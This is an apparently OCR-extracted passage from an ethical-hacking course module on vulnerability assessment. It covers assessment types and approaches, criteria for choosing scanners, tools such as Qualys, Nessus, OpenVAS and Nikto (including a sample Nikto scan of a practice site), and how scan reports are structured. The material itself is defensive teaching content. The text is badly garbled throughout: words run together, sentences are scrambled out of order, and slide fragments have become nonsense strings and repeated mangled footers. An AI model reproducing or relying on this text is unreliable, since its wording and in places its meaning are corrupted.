towireless
network.
the
Distributed
Assessment
employed
Thistypeof assessment, byorganizations
that possess
assetslike servers and
clients at different locations, involves simultaneously assessingthe distributed
organization assets, such as client and server applications, using appropriate
synchronization techniques. Synchronization playsa critical role i n this type of
assessment.Bysynchronizing all theseparate
the test runs together, assetssituatedat
multiplelocationsc an betestedat the same time.
CredentialedAssessment
Credentialed assessmentis also calledauthenticated assessment.In this type of
assessment,the ethicalhackerpossessesthe credentialsof all machines
presenti n the
assessed
network.The chances of findingvulnerabilities
relatedto operating
systems
andapplications are higher i n credentialassessmentthan i n non-credential assessment.
Thistypeof assessmentis challenging since it is highly unclearwho owns particular
assets in largeenterprises, and even when the ethical hackeridentifiesthe actual
‘ownersof the assets, accessing the credentialsof theseassetsis highly trickysince the
asset owners generally do not sharesuchconfidentialinformation.Also,even if the
ethicalhackersuccessfully acquiresall required credentials, maintaining the password
list is a huge task since there can be issueswith things like changed passwords,typing
errors, andadministrativeprivileges. Although it is the bestway of assessing a target
enterprise networkforvulnerabilitiesand is highly reliable, it is a complexassessment

thatis challenging.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Non-Credentialed
Assessment
Non-credentialed alsocalledunauthenticated
assessment, provides
assessment, a quick
‘overviewof weaknessesbyanalyzingthe networkservices that are exposed bythe host.
Since it is a non-credentialassessment, an ethical hackerdoes not require any
credentialsfor the assets to perform their assessments.This typeof assessment
generates a brief reportregardingvulnerabilities;
however, it is not reliablebecause it
doesnot provide deeper insight
into the OSandapplication vulnerabilitiesthat are not
exposed bythehostto the network,Thisassessmenti s alsoincapable of detectingthe
vulnerabilitiesthat are potentially
coveredbyfirewalls.It is prone to false-positive
outputsandis not reliably a s compared
effective to credential-based
assessment.
‘Manual
Assessment
After performing
footprinting
andnetworkscanningandobtaining crucialinformation,if
the ethicalhackerperforms manualresearch for exploring the vulnerabilities
or
weaknesses,theymanually rank the vulnerabilitiesand score them byreferring to
vulnerability
scoringstandards
likeCVSSandvulnerability databases likeCVEand CWE.
is
Suchassessmentconsidered
AutomatedAssessment
to bemanual.

assessmentwhere an ethicalhackeruses vulnerability

‘An assessmenttools suchas
Nessus, Qualys, or GFILanGuardto performa vulnerability
assessmentof the targeti s
called an automated assessment. Unlike manual assessments, i n this type of
assessment, the ethicalhackerdoes not perform footprinting and network scanning,
They employ automatedtoolsthat can performall suchactivities and are alsocapable
of identifying weaknessesand CVSSscores, acquiringcriticalCVE/CWE information
relatedto the vulnerability,
andsuggestingremediationstrategies.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

aseetment
Typee
Classification
‘Vulnerability and

Assessment
Reports
‘Vulnerability

AssessmentSolutionsand Tools
Vulnerability
Vulnerability toolsforinformation
assessmentsolutionsare important security
management
as
theyidentify
all potential weaknesses
security beforea n attackercan exploit
them.Thereare
approaches
different to perform
andsolutionsavailable a vulnerability
assessment.Selecting
an
assessment approach
appropriate playsa major role i n mitigatingthe threats that an
organization
faces.
This section outlinesthe various solutions,and tools used to perform
approaches, a

vulnerability
assessment,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Comparing
Approaches Assessment
to Vulnerability

Product-Basedversus Service: asedAssessmentSolutions

organizations
interna frm
© Instatedinthe
network
Otero bythie parties,
(©
secur consulting
such a s audting
oF

are
(©insted i n private
or nonroutable

others
the Inernet addressable
space
portionofan
or |@Somesolutions hostedinsidethe
‘network,
network
whe are hostedoutside
the

(©installedintheprivate
network
or in other drawback ofthissolutionsthat attackers

‘detect
outside
attacks an aut thenetwork fromoutside

e@
|
‘Comparing
Approaches Assessment(Cont'd)
to Vulnerability iq
‘Tree-Based
versus Inference-BasedAssessment

‘Tree-Based
Assessment Inference-BasedAssessment

selects
diferent Scanning
‘The
ator
stars
by
building
inventory foreach
strategies |@
pratocel
foundonthemachine
an of

sect
Forexample,
services,
3
the administrator

andusesserver
another scanner for
scanner
for
Ununservers
toring
an emallserver
protocol
thescanningprocess
o database
webserver,

without
any machine
Startingshotof neligence,
Continuous
andthen scanning
information
incorporating
‘ulnerabilties
on each
onlytherelevanttests
‘execute
andtars to

&
Comparing Approaches to Vulnerability
Assessment
Thereare fourtypesof vulnerability
assessmentsolutions:product-based
solutions,
service-
basedsolutions,
tree-basedassessment,
andinference-based
assessment.
Product-Based
Solutions
Product-based solutionsare installedi n the organization's
internalnetwork.Theya re
installedeither on a privateor non-routablespace or i n the Internet-addressable

ical andCountermensores
Mackin ©by E-Comel
Copyright
portionof an organization's
network,If theyare installed
o n a privatenetwork(behind
the firewall),
theycannot always
detectoutsideattacks.
Service-Based
Solutions
solutionsare offeredby third parties, such as auditing
Service-based or security
consulting
firms.Somesolutionsare hostedinsidethe network,
whileothersare hosted
outsidethe network.A drawback
ofthissolutionis thatattackerscan auditthe network
fromtheoutside.
Tree-Based
Assessment
Ina tree-basedassessment,
component
the auditorselectsdifferent
of the informationsystem.
for servers runningWindows,
Forexample,
databases,
for
each
strategies machineor
theadministratorselectsa scanner
andweb services but uses a different scanner
for Linuxservers. Thisapproach
relieson theadministratorto provide a startingpieceof
intelligence, and then to start scanningcontinuously without incorporating any

Inference-Based
at of
informationfound the time scanning,
Assessment
In an inference-based scanning starts bybuilding
assessment, of the
an inventory
protocols
foundon themachine.Afterfinding thescanningprocessstarts to
a protocol,
detectwhichportsare attachedto services, suchas an emailserver, web server, or
server. Afterfinding
database services, it selects
vulnerabilities
on eachmachine
and
startsto execute onlythoserelevantt ests.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Characteristics
of a Good AssessmentSolution
Vulnerability (CEH
©terre
caret
ering
netweri
oso te netwetreeres por pote

© wetcrazed inferencetasd approachor tesing

Uses
an pert ee

e Automatica againstcontinuously
cane updateddatabases

©
iS)
crores tr reports,incing valerie,
storable and customizable svete
by andend ana

e Suggests remedies
appropriate andworkarounds
tocorrect vlnerabites

© rvs ouside
ew acters

Organizations
a
Characteristicsof GoodVulnerability
AssessmentSolution
needto selecta proper andsuitablevulnerability
assessmentsolutionto detect,
their criticalIT assetsfromvarious
assess,andprotect internalandexternalthreats.
of a good
Thecharacteristics assessmentsolutionare as follows:
vulnerability
=
Ensurescorrect outcomes bytestingthe network, networkresources, ports,protocols,
andoperating systems
Usesa well-organized inference-based
approach fortesting
‘Automatically
scansandchecks continuously
against updated databases
Createsbrief,actionable, reports,including
customizable reportsof vulnerabilitiesby
level,
severity andtrendanalysis
Supports multiplenetworks
Suggestsappropriate remedies andworkarounds to correct vulnerabilities
Imitates theoutsideview
of
attackers to gain its objective

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Vulnerability
Working Solutions
Scanning

a nd
Sarvies
>|

Findings
andRecommendations

of Vulnerability
Working Solutions
Scanning
Anyorganization needsto handleandprocesslarge volumesof datato conductbusiness. These
largevolumesof data contain privileged information of that particularorganization.Attackers
tryto identify and then use theseto gain accessto critical
vulnerabilitiesthat theycan exploit,
datafor illegal purposes.Vulnerability analysisanalyzes and detectsrisk-prone areas i n the
organizational network.This analysis uses various tools and reportson the vulnerabilities
present i n the network

Vulnerability scanningsolutions perform vulnerability

penetration t ests on the organizational
networki n threesteps:
Locating nodes:Thefirst stepi n vulnerability scanningis to locatelive hostsi n the
targetnetworkusingvarious scanningtechniques.
Performingserviceand OSdiscovery on them: After detecting the live hostsin the
targetnetwork,the next stepis to enumerate the open portsand services along with
the operating on the targetsystems,
system
Testingthoseservicesand OSfor knownvulnerabilities:Finally,
after identifying
the
servicesandthe operating
‘open systemrunningon thetargetnodes,
theyare testedfor
known
vulnerabilities

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Termof References

> Perform
Serviceand
OSDiscovery
‘Test
Services
OSfor
Known
Vulnerabiliti

Findings andRecommendations

55: Theworking
Figure of vulnerability
|

seamingsolutions

Modul
5 520
Page tical andCountermensores
Making Copyright©
by Comet
 of Vulnerability
Types AssessmentTools

‘Types
of Vulnerability
AssessmentTools
Thereare six typesof vulnerability assessmenttools,
vulnerability
assessmenttools:host-based
application-layervulnerabilityassessmenttools,depthassessmenttools,scopeassessment
tools,active andpassivetools,andlocationanddata-examinationtools.
Vulnerability
Host-Based Assessment
Tools
Thehost-based scanning
suchas the Web,critical
toolsare appropriate
files,databases,
for
directories,servers
that run various applications,
andremote accesses.Thesehost-
based scanners can detect highlevels of vulnerabilitiesand provide required
information aboutthe fixes(patches). A host-basedvulnerability assessmenttool
identifiesthe OS running on a particularhost computerand tests it for known
deficiencies.
t alsosearches forcommon applications
andservices.
Depth
Assessment
Tools
Depthassessment tools are used to discoverand identifypreviously
unknown
vulnerabilities
to a
in a system.
system's
interface, Generally,
tools suchasfuzzers,
are usedto identify
whichprovide arbitrary
input
vulnerabilitiesto an unstabledepth.
Many
of thesetoolsuse a set of
toa knownvulnerability vulnerability
signatures
or not.
product to test whethera is resistant

Application-Layer
Vulnerability
AssessmentTools
vulnerability
Application-layer assessmenttools are designed to serve the needsof all
kindsof operating
systemtypesand applications.Variousresources posea varietyof
securitythreatsand are identified bythe tools designedfor that purpose. Observing
systemvulnerabilitiesthrough the Internet using an external router, firewall,
or
webserveris calledan externalvulnerabilityassessment.Thesevulnerabilitiescouldbe

ical andCountermensores
Mackin ©by E-Comel
Copyright
external DoS/DD0Sthreats,network datainterception,or otherissues. The analyst
performs a vulnerability
assessmentand notes vulnerableresources. The network
vulnerability
informationis updated into the tools. Application-layer
regularly
vulnerability
assessmenttoolsare directedtowardswebservers or databases.

Scope AssessmentTools
‘Scopeassessmenttools provide bytestingvulnerabilities
an assessmentofthe security
i n the applications
and operating
system. Thesetools provide
standardcontrolsand a
reporting interface
thatallowstheuser to selecta suitablescan. Thesetoolsgenerate
a
standardreportbasedon the informationfound.Someassessmenttools are designed
to test a specific or application
application typefor vulnerability.
ActiveandPassive
Tools
Activescanners perform vulnerability
checkson the networkfunctionsthat consume
resources on the network.Themain advantage of the active scanner is that the system
administratoror IT managerhasgoodcontrolof the timingand the parameters of
vulnerability scans. Thisscanner cannot be usedfor criticaloperating systems becauseit
usessystem resourcesthat affectthe processing
ofothertasks.
Passive s canners are thosethat do not considerably affect systemresources,as they
onlyobservesystemdataandperform dataprocessing o n a separate analysismachine.
A passivescanner first receives system datathat provide complete informationon the
processes
that and that
data
are running then

LocationandDataExaminationTools
assesses against a set of rules.

Listedbeloware some of thelocationanddataexamination tools:

© Network-BasedScanner:Network-based scannersare thosethat interact only
with
the realmachinewherethey resideand give the reportto the same machineafter
scanning.
‘Agent-Based
Scanner:Agent-based scanners resideon a single machinebut can
scanseveralmachines
on the same network.

ProxyScanner:Proxyscanners are the network-basedscanners that can scan

networksfromany machineon the network.
Cluster scanner: Clusterscanners are similar to proxy scanners, but theycan
simultaneously
perform
two or more scanson differentmachines
in the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Choosing AssessmentTool
a Vulnerability

|
tools
are
Winerabitya ssessment used
t o test a hostor aplication
forvulnerabies

|G Choosethe
tools
that bestsats theflowingrequirements:

asa number
of egulaty vlnerabityserpsothe
updated platforms thatyou are

Choosing AssessmentTool
a Vulnerability

Vendor-designed
vulnerability
assessmenttools can be usedto test a host or application
for
Thereare severalavailablevulnerability
vulnerabilities. toolsthat includeport
assessment
vulnerability
scanners, andOSvulnerability
scanners, assessmentscanners.Organizations
must
toolsbasedon theirtest requirements.
chooseappropriate
thetoolsthat bestsatisfy
Choose thefollowing
requirements:
=
Toolsmust becapable of testinganywhere
fromdozensto 30,000
different

Theselected
onthe
depending product
vulnerabilities,
toolshouldhavea sounddatabase andfrequently
ofvulnerabilities
updated
attack signatures
Picka toolthat matches
the environment andexpertise
Makesureregularly
to update the scan engineto ensure the tool is aware of thelatest,
known
Verify
vulnerabilities
thatthe chosenvulnerability
assessmenttool hasaccurate networkmapping,
application tests. Not alltoolscan findtheprotocols
mapping,andpenetration running,
andanalyze
a network'sperformance.

Ensurethatthe tool hasseveralregularly

updated vulnerability
scriptsfor the platforms
you are scanning.
Makesure that anypatches are applied;
failing
to do so might
leadto falsepositives
a re returned,
Findout how many reports whatinformationtheycontain,
andwhether
theyare exportable

ical andCountermensores
Mackin ©by E-Comel
Copyright
Check
whetherthe too!hasdifferent
levelsof penetration
to stoplockups
Themaintenancecostsof toolscan beoffsetbyeffectively
usingthem
Ensurethatthe vulnerability
assessmenttool can run quickly
andaccurately
its scans
Ensurethatthe tool can perform scans usingmultiple
protocols
Verify
thatthetoolcan understandandanalyze
thenetworktopology
to perform
the
assessment
Bandwidthlimitationsare a majorconcern whendealing
with large
networks.Ensure
thevulnerability bandwidth
assessmenttool hashigh allocation
Ensurethat the vulnerability excellentquerythrottling
assessmenttool possess features
Ensurethatthe tool can alsoassess fragile andnon-traditionalassets
systems

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Criteria for Choosing AssessmentTool
a Vulnerability

Types being
ofvulnerabilities a ssessed

Testing
capabilty
of scanning

‘Ability
to provide
accuratereports

ficient andaccurateseanning

o performa smart search

Capability

forwritingitsown tests
Funetionality

Testunscheduling

Criteriafor Choosing AssessmentTool

a Vulnerability
Thecriteria to follow whenchoosing
or purchasing
any vulnerability
assessmenttool are as
follows:
=
Types being
ofvulnerabilities assessed:
Themost importantinformation
at thetime of
evaluating
anytool is to find out how many typesof vulnerabilitiesit will discover.
Testing
capability
of scanning:Thevulnerability assessmenttool must havethe capacity
to execute the entire selectedtest andmust scan all the systems
selectedfor scanning,
Abilityto provide accurate reports:The abilityto prepare an accurate reportis
essential.Vulnerability
reportsshouldbe short,clear,andshouldprovide a n easy
methodto mitigate thediscovered vulnerability
Efficientandaccurate scanning:Two essentialaspectsof scanner performance
are how
muchtime it takesfor a single hostand whatresources are required, andthe lossof
at the time of scanning.It is important
services to ensure accuracyandto be aware of
theaccuracy oftheresults.
Capabilityto perform a smart search: Howclevertheyare at the time of scanningis
alsoa key
factori n judging anyvulnerability
assessmenttool.
Functionalityfor writing its own tests:Whena signature is not presentfor a recently
found vulnerability,
itis helpfulif the vulnerability
scanningtool allowsthe use of user-
developedtests.

Testrun scheduling: to be able to do test-run scheduling

It is important as it allows
users to perform
scanningwhentrafficon the networkis light.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BestPracticesfor Selecting AssessmentTools
Vulnerability
(©Ensurethati t does
n ot damage
yournetwork
or whlerunning
system tools

collected
thefunctionality,
‘Understand
beforebeginning
anddecide
ontheinformation
that
needs to be

‘Decide
thesource location
ofthescan taking
into consideration
the information
hatneeds tobecollected

Enable
loging
everyis
scanned
tie a computer

thei
Users shoulsan fr wuinerabiltes
frequently
systems

BestPracticesfor Selecting Vulnerability AssessmentTools

Someof the bestpractices
that can beadoptedfor selecting vulnerability
assessmenttoolsare:
Vulnerabilityassessmenttoolsare usedto secure andprotectthe organization’s
system
or network.Ensurethattheydo not damage the networkor systemwhilerunning,
Beforeusinganyvulnerabilityassessmenttools,itis important
to understand
their
functionandto decidewhatinformationis neededbeforestarting
Securitymechanisms foraccessingfromwithinandfromoutsidethe networkare
somewhatdifferent,
so decidethe locationfor the scan basedon the desired
information
At the time of scanning,
enablelogging andensure that all outcomesandmethodologies
are annotatedevery time a scan is performed
on any computer

Usersshouldfrequently for vulnerabilitiesandregularly

scan their systems monitor
themforvulnerabilitiesandexploits

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Vulnerability
(©
A
AssessmentTools: Qualys

cloud
basedservice that
Vulnerability C/EH
Management
j

global
fers immediate
visit in

Internettreat 9

‘dentition
ofthreats
montoring
{and of
unexpectedchangesina

becomebreaches

@auaiys
AssessmentTools:NessusProfessionaland
Vulnerability
GFILanGuard
nascent
oridettying
seluton

05
Module 527
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 AssessmentTools:OpenVAS
Vulnerability and Nikto (CEH

inion ‘Analyeer
(MBSA)

Web
cunts Vlortity eSECUREIA

‘Vulnerability
AssessmentTools
performs
An attacker vulnerability to identify
scanning loopholes
security in the targetnetwork
that theycan exploit analysts
to launchattacks.Security can use vulnerability
assessmenttools
to identify weaknesses presenti n the organization’s
securitypostureand remediatethe
identifiedvulnerabilitiesbeforean attackerexploits
them.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Networkvulnerability scannershelp andidentify
to analyze vulnerabilities
i n the targetnetwork
or networkresources byusing vulnerability
assessmentandnetworkauditing. Thesetoolsalso
assistin overcoming weaknessesin thenetworkbysuggesting
various remediationtechniques.
Thefollowing
Qualys
are most
effective
vulnerability
assessment
some of the

Vulnerability
tools:
Management
Source:https://www.qualys.com
Qualys
VM is a cloud-based global
service thatgivesimmediate, visibility
into whereIT
mightbe vulnerableto the latestInternet threatsandhow to protectthem.It
systems
helps
to continuously
identify
threatsand monitor unexpected
changes
i n a network
beforetheyturn into breaches.
Featurc
© Agent-based
detection
workswith the Qualys
‘Also extending
CloudAgents, its networkcoverageto
unscannable
assets,
Constantmonitoring
andalerts
VM is paired
‘When (CM),
with Continuous Monitoring InfoSecteams are proactively
threats,so problems
alertedabout potential can be tackledbefore theyturn into
breaches.
‘Comprehensive
coverageandvisibility
Continuously scans and identifies vulnerabilities
for protectingIT assets on-
i n the cloud,
premises, and at mobileendpoints.
Its executive dashboarddisplaysan
of
‘overview the securitypostureandgives access to remediationdetails.VM
generates for multiple
role-basedreports
custom, including
stakeholders, automatic

security forcompliance
documentation
auditors.
for
VM
‘As
the perimeter-less
enterprises
world
adoptcloudcomputing, mobility,
andother disruptive
technologies
for digitaltransformation,Qualys VM offers next-generation vulnerability
management for thesehybrid
IT environments whosetraditionalboundarieshave
beenblurred.
forgotten
Discover devicesandorganizethehostassets
Qualys
can helpquickly
determinewhat is running in different partsof the
network—from the perimeterand corporatenetworkto virtualizedmachinesand
cloudservices. It can alsoidentify
unexpected web servers, andother
accesspoints,
devicesthat can exposethe networkto attack.

‘Scan
systems
everywhere,
forvulnerabilities
‘Scan
anywhere fromthe same console,
and
accuratelyefficiently
including
the perimeter,
the internal
network,
andcloudenvironments.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Identify risks
andprioritize
Qualys,usingtrend analysis, and Patchimpactpredictions,
Zero-Day, can identify

business
the highest
Remediate
risks
vulnerabilities
Qualys’s
ability
to trackvulnerability
dataacrosshostsandtime produces
interactive
reportsthat provide a better understanding
of the security
of thenetwork.

56:Vunerablty
Figure s caning sing Qualys
unerabiltyManagement
NessusProfessional
Source:https://www.tenable.com
Nessus Professionalis an assessment solution for identifying vulnerabilities,
configuration networks.It performs
issues,andmalwarethat attackersuse to penetrate
configuration,
vulnerability, and compliance assessment. It supportsvarious
technologies
such as operatingsystems, network devices, hypervisors,databases,
tabletsandphones,
web servers, andcriticalinfrastructure.
Nessusis the vulnerability
scanningplatform
for auditorsand securityanalysts,
Users
can schedulescans across multiplescanners,and use wizardsto easily
and quickly
create policies,
schedulescans,andsendresultsvia email
Features:
© High-speed
assetdiscovery

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Vulnerability
assessment
MalwareandBotnetdetection
Configuration
andcompliance
auditing
9

Scanning
auditing
virtualized
and platforms andcloud

Figure57:Vulnerability
scanning Nessus
using
GFILanGuard
Source:https://www.gfi.com
GFI LanGuardscans for,detects,assesses,and rectifiessecurity
vulnerabilitiesi n a
networkand its connecteddevices.Thisis donewith minimaladministrativeeffort. It
scans the operating
systems, virtual environments,and installedapplications
through
vulnerabilitycheckdatabases.It enablesanalysisof the state of network security,
identifiesrisks,
andofferssolutionsbeforethe system can be compromised,

Features:
for operating
©. Patchmanagement applications
andthird-party
systems
©
Vulnerability
assessment.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘AWeb console
reporting
Tracklatestvulnerabilitiesandmissingupdates
Integration applications
with security
9

Network
device
checks vulnerability
Networkandsoftware
auditing
Support
forvirtual environments

ieee
are + Qvimwrsnoes
Me ©
sae
© rc
treaties
oe

©
vnoerat
tcnne

‘Openvas
5.8:scanning
GF
Figure Vunerablty using LanGuard

Source:http://www.openvas.org
is a framework
COpenVAs of severalservices andtools thatoffera comprehensive
and
powerful
vulnerability
scanningandvulnerability management solution.Theframework
is part of Greenbone commercialvulnerability
Network’s solution,
management
developments
fromwhichhavebeencontributedto the open-source communitysince
2008.
scanner is accompanied
Theactualsecurity bya regularly feedof Network
updated
Vulnerability
Tests(NVTs),
over 50,000
i n total

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Deshberd Scio Conran Exran—_Adminntraton

10101016 135Rep

rc Report
sts:
weak
Cipher
Sutes
timestamps %
10101016
10.10.1016
s380Rcp
generar EN
ED

Figure3:Vulnerability
scanning OpenvAs
using
Nikto
Source:https://cirt.net
Nikto is an Open Source(GPL)webserver scanner that performs
comprehensive
tests
against web servers for multiple
items,including
over 6700 potentially
dangerous
files
orprograms,checksforoutdated versions of over 1250servers, andchecksforversion
specific
problems
on over 270 servers. It alsolooksat server configuration
items suchas
the presenceof multiple indexfilesand the HTTPserver optionsandwill attemptto
identify
installedweb servers andsoftware.
Features:
(Unix
SSLSupport or maybe
with OpenSSL Peri/NetSSL)
Windowswith ActiveState’s
Aull HTTPproxy support
Checksforoutdatedserver components
Savesreportsi n plain
text,XML,HTML, NBEor CSV
Template
‘A engineto easily customizereports
multiple
‘Scans ports server, or multiple
on a serversvia inputfile
IDSencoding
LibWhisker’s techniques
Identifiesinstalledsoftwarevia headers,
favicons,
andfiles
Hostauthentication
withBasicandNTLM
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Subdomain
guessing,
‘Apache
andcgiwrapusernameenumeration
Scantuningto includeor excludeentire classesvulnerability
for authorizationrealms(including
Guessescredentials
of
checks
many default1Dand
combinations)
password

dpikto -hwwe cortitiedhacker,con “Tuning

NiKUOVETD x
Target 162,281.216.11
Tar _
IP:

e:
www.certifiedhacker.com
TargetPort 80
2019-11-19 20:41:24
(GTB)

ackingX-Frame-Optionsheader present
ion headernot defined, This
is
can hint to the u:
header
agent t o protect against sone forns of XSi
The X-Content-Type-Options header not set. This could a llow

a
is
to render the content of the site i n different fashion to the MIME
type
rtifiedhacker zip:
Potentially interesting archive/cert
Error Limit (26) reachedfor host, giving up. file
Last
error
found

Last
error
ERROR:
ERROR: ErrorL imit (20) reached for host, giving up.
Scan terminated: 19 error(s) and4 item(s) reported o n renote host
EndTine 2019-11-1920:51:15 (GTB) (591seconds)

L hostis) te

Figure
5.10:Screenshot
of Nkto
Listedbeloware some of the additionalvulnerabilityassessmenttools:
=
FreeScan(https://freescan.qualys.com)
Qualys
=
AcunetixWebVulnerability
Scanner(https://www.acunetix.com)
=
(https://www.rapid7.com)
Nexpose
=
Network
SAINT
Security (hetps://www.beyondtrust.com)
Scanner
(https://www.saintcorporation.com)
MicrosoftBaseline Analyzer
Security (MBSA) microsoft.com)
(https://www.
(AVDS)
beSECURE (https://www.beyondsecurity.com)
Pro(https://www.coresecurity.com)
CoreImpact
N-StalkerWebApplication Scanner(https://www.nstalker.com)
Security
Vulnerability
ManageEngine Plus(https://www.manageengine.com)
Manager

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AssessmentToolsfor Mobile
Vulnerability
onthe
based Metrics | Sees

AssessmentTools for Mobile

‘Vulnerability
=
VulnersScanner
Source:https://vulners.com
Vulners
scanner is an android that performs
application passivevulnerability
detection
fingerprint.
basedon a softwareversion’ Sincethis is a passivemethodof vulnerability
this app can onlybe usedto identify
assessment, vulnerabilities;
it is not effectivei n
performing
compliance
checks.

5.1: ~ rik
Figure Vulners
Scanner ertcal core

Modul
05 525
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘Vuners
Seanner

5.12:VulnesScanner medium
Figure —
riskscore

SecurityMetrics
Mobile
Source:https://www.securitymetrics.com
SecurityMetrics Mobile is a mobiledefensetool that helps to identify
mobiledevice
wulnerabilitiesto protect sensitive data. It helps
customers’ to avoid threatsthat
originatefrommobilemalware,devicetheft,Wi-Finetworkconnectivity, data entry,
personal and businessuse, unwarrantedapp privileges, data and device storage,
account dataaccess,Bluetooth, (IR),
Infrared communication (NFC),
Near-field andSIM
SD
and cards.
MobileScancomplies
SecurityMetrics with PCI SSC(Payment Card Industry Security
Council)
Standards guidelines
to prevent mobiledatatheft.Oncompletion of a scan,the
reportgenerated
comprisesa total riskscore, a summary of discoveredvulnerabilities,
on howto resolvethreats,
andrecommendations

ical andCountermensores
Mackin ©by E-Comel
Copyright
 securitysurnies

Figure5.1:SecurityMetrics
Mobile

ical
—
result

andCountermensores ©by E-Comel

Mackin Copyright
 ModuleFlow

‘Vulnerability
Assessment Concepts

Classification
‘Vulnerability and

‘Vulnerability
Arsossment Solutions

Vulnerability
Assessment Reports

report
closes
risks
detected
after
Thewnerabltyassessment the seaning network

Thereport
alerts
Information
theorganization

avallabe
of possibleattacks

is ueed
tf
andsuggests

flaws
countermesures

in thereports security

Vulnerability
Asessment Report

SE AssessmentReports
Vulnerability
Ed
In the vulnerability assessmentprocess,once all the phases are completed,the securityteam
will review theresultsandprocess theinformationto preparethefinal report.In thisphase,
the
security team will try to discloseany identifiedvulnerabilities,
documentany variations and
findings, andincludeall thesein the finalreportalong with remediationstepsto mitigatethe
Identifiedrisks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thevulnerability
assessmentreportdiscloses through
therisksthat are detected scanningthe
GFlLanGuard,
network.Toolssuchas Nessus, and QualysVulnerability
Management are used
for vulnerability
assessment.Thesetools provide a comprehensive assessmentreportin a
specifiedformat. The report alerts the organizationto possible attacks and suggests
countermeasures.
The reportprovides
detailsof all the possible
vulnerabilitieswith regard to the company’s
policies.
security Thevulnerabilitiesare categorized
basedo n severityinto three levels:High,
Medium,andLowrisk.
High-risk
vulnerabilitiesare thosethat mightallowunauthorizedaccessto the network.These
vulnerabilitiesmust be rectifiedimmediatelybeforethe networkis compromised, The report
describesdifferentkindsof attacksthat are possiblegiventhe organization's
set of operating
networkcomponents,
systems, andprotocols.

report
Thevulnerability
must
assessment
to,
but are not limited thefollowing
include, points:
‘=

date
of
The
name
and
Thevulnerability's
discovery
its mapped
CVEID

‘=
Thescore basedon Common (CVE)
VulnerabilitiesandExposures databases
vulnerability
A detaileddescription
of the

The
impact
vulnerability
of the
Detailsregarding
theaffectedsystems
Detailsregarding
the process neededto correct the vulnerability,
including
information
patches,
configuration
fixes,andportsto beblocked,

A proof (PoC)
ofconcept ofthe vulnerability (ifpossible)
forthe system
Vulnerability Report
Assessment

Sean
Information information
Target esol

5.25:Components
Figure unerabilly
of» assessment report

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Analyzing
Vulnerability
Scanning
Report

=
AnalyzingVulnerability
ScanningReport
A vulnerability reportprovides
assessment detailedinformationon the vulnerabilitiesfoundi n
the computing
computing systems The
environment. reporthelps
(such as web servers, firewalls, identify ofthe
organizations the security
routers,email,
posture
andfile services)
solutionsto reduce systemfailures,An ethical hackermust be careful in analyzing
andprovide
the
vulnerabilityassessmentreportsto avoidfalsepositives,
‘The
assessmentreport helps organizations to take mitigation stepsto proactively
avoidriskby
Identifying,
tracking,andeliminating security vulnerabilities.
Vulnerabilityreportscover thefollowing elements:
=
Scaninformation: Providesinformation suchas the name of the scanningtool,its
version, andthe networkportsto bescanned
Target information:Containsinformationaboutthe targetsystem’s name andaddress.

Results:A complete scanning reportcontaining subtopics suchas target,services,

vulnerability,
classification,andassessment.
Target:Includeseachhost’s detailedinformationand contains the following
information:
© <Node>:Contains

© <OS>: Showsthe
of
the nameandaddressthe host

operating system type

© <Date>:

Services:
date
Givesthe
of the test
Definesthe networkservices bytheir namesandports.
Classification:
Allowsthe system administratorto obtainadditionalinformationabout
the scan,suchas its origin.

5
Module Page$40 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 =
Assessment: Providesinformation
regarding assessmentof discovered
the scanner’s
vulnerabilities,
Vulnerability are classified
assessmentreports into two types:
+

+
Security
Security
Vulnerability
Reports
Vulnerability
Summaries
Security
Vulnerability
Report
Thisisa combinedreportforall the scanneddevicesandservers in the organization's
network.
Thesecurityvulnerability
report includes following
the details
+
Newlyfoundvulnerabilities
+
Openportsanddetectedservices

tofor
+
Suggestionremediation
+
Links patches
‘Asample vulnerability
security reporti s as follows:
DetailedResults

available
Exploits

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Vulnerability
Security Summary
Thisreporti s produced
for everydeviceor server after scanning.
It ives a summaryof the scan
resultthat includesthe following
elements:
+
flaws
Currentsecurity
+

+
Newlyd
of vulnerabilities
Categoriesvulnerabilities
etected
security

Resolved
of
Theseverityvulnerabilities
vulnerabilities

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary
nhs
>
module,
we have
dscustes
T hedefintonofwinery research, nerdy assessment, andvunerablty.

‘Various
ype ofwuneablties anduerablty assessment techniques

Varioustol tht are wedto testa hosto applation foruinerabites,lonewth

theciter and bestpractices forselecting
thetol

with
a
report oa
Weconcluded
andhowit dsclses
detalles
cussionon how analyte wnerabityassessment
thers
detectedater scaning
thenetwork
{inthe
nent
module,
forwilthe well
ethical
we

and
dct

wulerabisty
ensbris
pentesters utile to hacka
methodsattacker, a s
b ased
system
‘ahitionsenrol foctornting,
as hackers and
information called abouta target
onthe
sarnine, enumeration,
of

Module Summary
Thismodulediscussed vulnerability vulnerability
research, assessment, andthe vulnerability-
management life cycle.
It alsodiscussed
the CVSS vulnerability
scoring systemanddatabases
andvarious typesof vulnerabilities and vulnerability
assessmenttechniques. It described
various vulnerability
assessmentsolutionsalongwiththeir characteristics
anddescribed
various
vulnerability
assessmenttoolsthat are usedto test a hostor application
for vulnerabilities,
along for selecting
with the criteria andbestpractices the tool. Finally,
thismoduleendedwith
a detaileddiscussion a vulnerability
on howto analyze assessmentreportandhow it discloses
therisksdetectedafter scanning
a network
Thenext modulewill showhow attackers,
as well as ethicalhackers and pen testers,attempt
hacking
